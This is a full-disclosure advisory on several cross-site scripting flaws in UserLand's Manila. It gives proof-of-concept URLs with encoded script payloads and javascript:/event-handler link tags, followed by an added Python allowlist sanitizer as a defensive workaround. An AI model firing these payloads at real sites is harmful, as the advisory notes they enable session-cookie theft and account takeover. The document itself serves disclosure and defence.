Multiple XSS bugs in manila.
To: manila-bugs@xxxxxxxxxxxx
Authors:
Michael Bauer <mihi@xxxxxxxxxx>, Aaron Kaplan <aaron@xxxxxxxxxx>
These bugs will be reported to you and released to the public 10 days after
submission to userland.com, as we strongly believe in full disclosure.
Software:
manila
Vendor:
userland.com
Versions tested:
<meta name="generator" content="UserLand Frontier 9.0.1">
Overview:
Manila is vulnerable to several XSS injections which can be abused
to steal the session cookie of a logged-in user. This means taking over
his session and acting in his name.
Details:
In the module "msgReader"
--------------------------
proof of concept:
http://manila.userland.com/discuss/msgReader$1?mode=%22%3E%3Cscript%3Ealert('XSS!')%3C/script%3E
In the module "sendMail"
--------------------------
proof of concept:
http://profiles.userland.com/sendMail?usernum=2500&referer=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
In the module "editInBrowser"
-----------------------------
explanation:
it is possible to use <a> and other HTML tags to put JavaScript
instructions into the web page. Examples:
<a href=javascript:alert('xss!')>click here</a>
<a href=# onmouseover="alert('xss!')">click here</a>
<a href=# onmouseout="alert('xss!')">click here</a>
a demo can be seen on http://mana.manila.at/discuss/msgReader$15?mode=day
as we got an account there.
Workaround:
HTML-escape all user input! If you want to accept HTML as input,
write your own HTML parser for a limited HTML subset.
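As an added illustration of both halves of this workaround (this is example code written for this note, not Manila's or UserLand's own), the Python below escapes untrusted text for the default case and, for the "limited HTML subset" case, rebuilds the input from an allowlist of tags and attributes so that the three <a> examples from the editInBrowser section lose their javascript: href and their on* handlers while the visible text survives. The tag allowlist, the scheme list and the function names are assumptions chosen for the example; the sample inputs are constructed from the payloads shown above.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist for the "limited HTML subset": tag -> attributes kept.
# Anything not listed (script, img, style, every on* handler, ...) is dropped.
ALLOWED_TAGS = {
    "a": {"href", "title"},
    "b": set(),
    "i": set(),
    "p": set(),
    "br": set(),
}
VOID_TAGS = {"br"}                      # never get a closing tag
SAFE_URL_SCHEMES = {"http", "https", "mailto"}   # assumed policy


def escape_untrusted(text: str) -> str:
    """The default workaround: escape everything so no markup survives.

    quote=True also escapes " and ', which matters when the value lands
    inside an attribute: the msgReader/sendMail payloads start with ">
    precisely to break out of a quoted attribute value."""
    return html.escape(text, quote=True)


def safe_href(value) -> bool:
    """Allow relative links and a few schemes; reject javascript: and friends."""
    if value is None:                   # bare `href` with no value
        return False
    # Browsers skip ASCII control characters and whitespace when reading the
    # scheme, so strip them before looking ("java\tscript:" -> "javascript:").
    compact = "".join(ch for ch in value if ord(ch) > 0x20)
    scheme = urlparse(compact).scheme.lower()
    if scheme == "":                    # "#", "/discuss/...", "msgReader$15"
        return True
    return scheme in SAFE_URL_SCHEMES


class SubsetSanitizer(HTMLParser):
    """Rebuilds the input from the allowlist; everything else becomes text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                      # tag dropped; its text still reaches handle_data
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag]:
                continue                # drops onmouseover, onmouseout, style, ...
            if name == "href" and not safe_href(value):
                continue                # drops javascript: links
            kept.append(' %s="%s"' % (name, html.escape(value or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag not in self.open_tags:
            return                      # stray or disallowed closing tag
        while self.open_tags:           # close back to the matching tag, keeps output balanced
            opened = self.open_tags.pop()
            self.out.append("</%s>" % opened)
            if opened == tag:
                break

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))

    def result(self) -> str:
        while self.open_tags:           # close anything the author left open
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize_subset(untrusted_html: str) -> str:
    parser = SubsetSanitizer()
    parser.feed(untrusted_html)
    parser.close()
    return parser.result()


if __name__ == "__main__":
    # Constructed inputs: the three tags from the editInBrowser section and a
    # script tag as it would arrive from the msgReader payload.
    for sample in [
        "<a href=javascript:alert('xss!')>click here</a>",
        "<a href=# onmouseover=\"alert('xss!')\">click here</a>",
        "<a href=# onmouseout=\"alert('xss!')\">click here</a>",
        "<b>fine</b> <script>alert(1)</script>",
    ]:
        print(sanitize_subset(sample))
    print(escape_untrusted("\"><script>alert('XSS!')</script>"))
```

The design choice worth noting is that the sanitizer never tries to recognise bad markup; it only emits what the allowlist permits, so a new tag or event attribute is blocked by default. Escaping must still match the output context: text that ends up inside an attribute needs the quote characters escaped, which is why the plain-escape helper uses quote=True.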
Disclaimer:
For educational purposes only; we are not responsible for any harm
produced by the security hole we published.